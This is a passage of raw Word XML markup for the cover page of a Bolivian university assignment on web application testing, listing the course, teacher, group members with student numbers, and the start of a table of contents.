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9482" w14:textId="5433B7D1" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="2"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52A3F1A4" wp14:editId="74BE88C2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2004365</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1402080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1744980" cy="2263536"/>
            <wp:effectExtent l="152400" t="152400" r="350520" b="346710"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1963591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2263536"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst>
                      <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
                        <a:srgbClr val="333333">
                          <a:alpha val="65000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="2"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="411A4959" wp14:editId="287CB120">
            <wp:extent cx="5400040" cy="1175385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1726468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75385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FA0F19" w14:textId="7C9AA833" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="00217090">
      <w:pPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3822240C" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="00217090">
      <w:pPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer Parcial </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CDC4D7" w14:textId="07FC5A99" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="00217090">
      <w:pPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Pruebas para App’s WEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410535D6" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="00217090">
      <w:pPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Grupo #9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEF2263" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRPr="00B52F07" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Materia:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingeniería de Software II</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14073364" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRPr="00B52F07" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Docente:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t xml:space="preserve"> MSc. Ing. Rolando Antonio Martínez Canedo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734B4DE1" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRPr="00B52F07" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Sigla y Grupo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t xml:space="preserve"> INF512 – SB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF7A6AD" w14:textId="77777777" w:rsidR="008C7F16" w:rsidRPr="00B52F07" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Integrantes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C21116" w14:textId="78DA93E2" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>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Cárdenas Carrasco Michel Albert</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DD0CA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>212033298</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25167BD2" w14:textId="0E448655" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>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Chambi Gonzales Niels Roy</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BB61D8" w:rsidRPr="00BB61D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>219012441</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A98E075" w14:textId="06EAD472" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>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Pillco Mamani Juan Pablo</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BB61D8" w:rsidRPr="00BB61D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>217175996</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7D90D" w14:textId="35884AD0" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>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Quispe Ticona Jhoel Debray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BB61D8" w:rsidRPr="00BB61D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>215162617</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E7475" w14:textId="63381DB7" w:rsidR="008C7F16" w:rsidRPr="008C7F16" w:rsidRDefault="008C7F16" w:rsidP="008C7F16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>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Soliz Álvarez David Andrés</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00906455" w:rsidRPr="00906455">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>213122294</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A274C" w14:textId="77777777" w:rsidR="00217090" w:rsidRDefault="00217090" w:rsidP="008C7F16">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B8EF930" w14:textId="6F563651" w:rsidR="00217090" w:rsidRPr="00217090" w:rsidRDefault="008C7F16" w:rsidP="00217090">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Semestre:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00217090">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>-202</w:t>
      </w:r>
      <w:r w:rsidR="00217090">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738EF194" w14:textId="1C296832" w:rsidR="008C7F16" w:rsidRPr="00217090" w:rsidRDefault="008C7F16" w:rsidP="00DD0CA3">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Lugar y fecha de presentación:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Aptos" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t xml:space="preserve"> Santa Cruz – Bolivia</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:id w:val="700133711"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="4DD6A0BE" w14:textId="4B51E5B0" w:rsidR="008C7F16" w:rsidRDefault="008C7F16">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>Tabla de contenido</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="20AF6384" w14:textId="026D7EA5" w:rsidR="0031097F" w:rsidRDefault="008C7F16">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
